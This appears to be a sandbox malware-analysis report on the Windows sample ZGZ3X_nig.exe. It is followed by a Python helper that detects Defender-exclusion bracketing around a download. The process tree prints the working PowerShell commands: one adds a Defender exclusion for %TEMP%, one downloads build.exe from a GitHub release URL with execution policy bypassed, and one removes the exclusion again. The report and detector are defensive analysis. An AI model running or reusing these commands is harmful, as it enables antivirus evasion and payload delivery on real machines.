Analysis

max time kernel: 120s
max time network: 121s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 22/03/2025, 02:40
Behavioral task behavioral1
  Sample: ZGZ3X_nig.exe
  Resource: win7-20240903-en

Behavioral task behavioral2
  Sample: ZGZ3X_nig.exe
  Resource: win10v2004-20250314-en

The analysis metadata above and the yara hits below reference behavioral1 (the Windows 7 x64 run); results from the Windows 10 run are not shown on this page.
General

Target: ZGZ3X_nig.exe
Size: 57KB
MD5: 16edd47bf01716b24958a0b3a3a7bcfb
SHA1: 8b7972f4190c2ca9d600084611e966fa0f899b98
SHA256: 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
SHA512: 9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1
SSDEEP: 768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/
Malware Config
(none listed)

Signatures

Command and Scripting Interpreter: PowerShell 2 IoCs
  pid   Process
  2228  powershell.exe
  2892  powershell.exe

UPX packed file 2 IoCs
  resource                                                                     yara_rule
  behavioral1/memory/2280-0-0x0000000140000000-0x0000000140028000-memory.dmp    upx
  behavioral1/memory/2280-28-0x0000000140000000-0x0000000140028000-memory.dmp   upx
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups. Here the trigger is the -ErrorAction SilentlyContinue appended to the two Defender exclusion commands (PIDs 2228 and 2696 in the process tree).
  pid   Process
  2228  powershell.exe
  2696  powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs
  pid   Process
  2228  powershell.exe
  2892  powershell.exe
  2696  powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs
  description              pid   Process
  Token: SeDebugPrivilege  2228  powershell.exe
  Token: SeDebugPrivilege  2892  powershell.exe
  Token: SeDebugPrivilege  2696  powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs
Each parent/child pair below is recorded three times in the report (18 entries in all); the count column gives the number of entries per pair.
  description                        pid   Process        procid_target  count
  PID 2280 wrote to memory of 1072   2280  ZGZ3X_nig.exe  29             3
  PID 1072 wrote to memory of 2964   1072  cmd.exe        30             3
  PID 2964 wrote to memory of 2692   2964  net.exe        31             3
  PID 1072 wrote to memory of 2228   1072  cmd.exe        32             3
  PID 1072 wrote to memory of 2892   1072  cmd.exe        33             3
  PID 1072 wrote to memory of 2696   1072  cmd.exe        34             3
Processes

1. C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
   PID: 2280
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
      PID: 1072
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\system32\net.exe
         Command line: net session
         PID: 2964
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 session
            PID: 2692

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
         PID: 2228
         - Command and Scripting Interpreter: PowerShell
         - Hide Artifacts: Ignore Process Interrupts
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
         PID: 2892
         - Command and Scripting Interpreter: PowerShell
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
         PID: 2696
         - Hide Artifacts: Ignore Process Interrupts
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

Reading the tree: the sample writes a batch script into a nested .tmp directory under %TEMP% and runs it through cmd /c, passing its own path as the first argument, a launch pattern consistent with a batch-to-exe wrapper. The script first runs net session, a common elevation check in batch files (it fails with "Access is denied" unless the shell is elevated, and Set-MpPreference itself needs administrator rights), then runs three PowerShell commands in order: add a Windows Defender exclusion for %TEMP%, download build.exe from the GitHub release URL into %TEMP% with TLS 1.2 forced (older .NET defaults on Windows 7 do not negotiate it), and remove the exclusion again so the change is short-lived. build.exe appears neither in the process tree nor in the dropped-files list below, so this run shows no evidence that the download succeeded or that the payload executed. The dropped batch file itself is also not reported by path.
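The add-exclusion / download / remove-exclusion sequence above is easy to miss if each PowerShell command line is judged on its own. As an added example (not part of the sandbox report), the following Python triage helper runs over the command lines from the process tree, constructed here as sample input with the PIDs the report lists, and reports the bracketing per parent process plus the per-process flags the signatures key on. The PPID 0 for the root, the TEMP value used to expand $env:TEMP (taken from the paths in the report), and all function names are this example's assumptions.

```python
"""Triage helper: flag Defender-exclusion bracketing around a download.
Added example, not part of the sandbox report."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass
class Proc:
    pid: int
    ppid: int
    cmdline: str


# Constructed sample input: command lines and PIDs copied from the report's
# process tree. PPID 0 stands in for the sandbox's own parent of the sample.
SAMPLE: List[Proc] = [
    Proc(2280, 0, r'"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"'),
    Proc(1072, 2280, r'"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"'),
    Proc(2964, 1072, "net session"),
    Proc(2228, 1072, r'powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"'),
    Proc(2892, 1072, r'powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"'),
    Proc(2696, 1072, r'powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"'),
]

# Assumed environment for expanding $env:TEMP; the value is the Temp path
# visible in the report, not something the sandbox exported.
ENV: Dict[str, str] = {"TEMP": r"C:\Users\Admin\AppData\Local\Temp"}

DOWNLOAD_CMDLETS = r"\b(?:iwr|Invoke-WebRequest|Invoke-RestMethod|Start-BitsTransfer|DownloadFile|DownloadString)\b"


def quoted_arg(name: str, cmd: str) -> Optional[str]:
    """Value of a -Name argument whose value is double-quoted, with or without
    the backslash escaping that appears inside a -Command string."""
    m = re.search(r"-" + re.escape(name) + r'\s+\\?"([^"]+?)\\?"', cmd, re.I)
    return m.group(1) if m else None


def expand_env(path: str, env: Dict[str, str]) -> str:
    """Expand PowerShell-style $env:NAME references from the assumed environment."""
    return re.sub(r"\$env:(\w+)",
                  lambda m: env.get(m.group(1).upper(), m.group(0)), path, flags=re.I)


def classify(p: Proc) -> Set[str]:
    """Tag one process with the behaviours the report's signatures key on."""
    c, tags = p.cmdline, set()
    if re.search(r"\bSet-MpPreference\b", c, re.I) and quoted_arg("ExclusionPath", c):
        tags.add("defender_exclusion_add")
    if re.search(r"\bRemove-MpPreference\b", c, re.I) and quoted_arg("ExclusionPath", c):
        tags.add("defender_exclusion_remove")
    if re.search(DOWNLOAD_CMDLETS, c, re.I):
        tags.add("download")
    if re.search(r"-ErrorAction\s+SilentlyContinue\b", c, re.I):
        tags.add("ignore_errors")            # "Hide Artifacts: Ignore Process Interrupts"
    if re.search(r"-ExecutionPolicy\s+Bypass\b", c, re.I):
        tags.add("execution_policy_bypass")
    if re.match(r'^\s*"?(?:[^"\s]*\\)?net(?:\.exe)?"?\s+session\b', c, re.I):
        tags.add("admin_check")              # net session errors out unless elevated
    return tags


def find_exclusion_bracketing(procs: List[Proc], env: Dict[str, str] = ENV) -> List[dict]:
    """Per parent process, in child order: an exclusion add, then a download,
    then removal of the same exclusion. Also reports whether the download
    target sits inside the excluded directory, which is the point of the trick."""
    by_parent: Dict[int, List[Proc]] = {}
    for p in procs:
        by_parent.setdefault(p.ppid, []).append(p)

    def norm(path: str) -> str:
        return expand_env(path, env).rstrip("\\").lower()

    hits = []
    for ppid, kids in by_parent.items():
        tagged = [(k, classify(k)) for k in kids]
        for i, (add, t_add) in enumerate(tagged):
            if "defender_exclusion_add" not in t_add:
                continue
            excluded = norm(quoted_arg("ExclusionPath", add.cmdline))
            download = remove = None
            for k, t in tagged[i + 1:]:
                if download is None and "download" in t:
                    download = k
                elif download is not None and "defender_exclusion_remove" in t \
                        and norm(quoted_arg("ExclusionPath", k.cmdline)) == excluded:
                    remove = k
                    break
            if download is not None and remove is not None:
                out = quoted_arg("OutFile", download.cmdline) or ""
                hits.append({
                    "parent": ppid, "add": add.pid, "download": download.pid,
                    "remove": remove.pid, "excluded_path": excluded,
                    "payload_in_excluded_path": norm(out).startswith(excluded + "\\"),
                })
    return hits


if __name__ == "__main__":
    for p in SAMPLE:
        print(p.pid, sorted(classify(p)))
    for hit in find_exclusion_bracketing(SAMPLE):
        print("exclusion bracketing:", hit)
```

On the sample above it reports one hit under parent 1072 (add 2228, download 2892, remove 2696) with the payload path inside the excluded directory. The same tags fall out of PowerShell script block logging (event 4104) or Defender's own exclusion-change events if you feed those command lines in instead of a sandbox tree; the parent grouping is what separates this pattern from an administrator who adds an exclusion once and leaves it.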
Network
(no entries shown on this page)

MITRE ATT&CK Enterprise v15
Techniques tagged by the signatures above: Command and Scripting Interpreter: PowerShell (T1059.001) and Hide Artifacts (T1564): Ignore Process Interrupts.
Downloads

(path not listed on the page)
  Filesize: 2KB
  MD5: 1c935ef28fdfd394b770d945d7f04d76
  SHA1: 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
  SHA256: aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
  SHA512: a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: fe5f201dd0f9a8151fa364aea81014fd
  SHA1: c367b7eb2dd29016eb555cc5985a4c320e06bbdf
  SHA256: b18e13a950f0a58b6acf293ab5f8528e7106253ba81a100ceeca062c3797a980
  SHA512: 60eb5d358b318e1c7e44c82aa501e767cd45a3010f704604377f9909be3d8b95fcde56297fb8e20793fe10609b79c5a5ee5d9cc3f588b85239a70ddc59842aac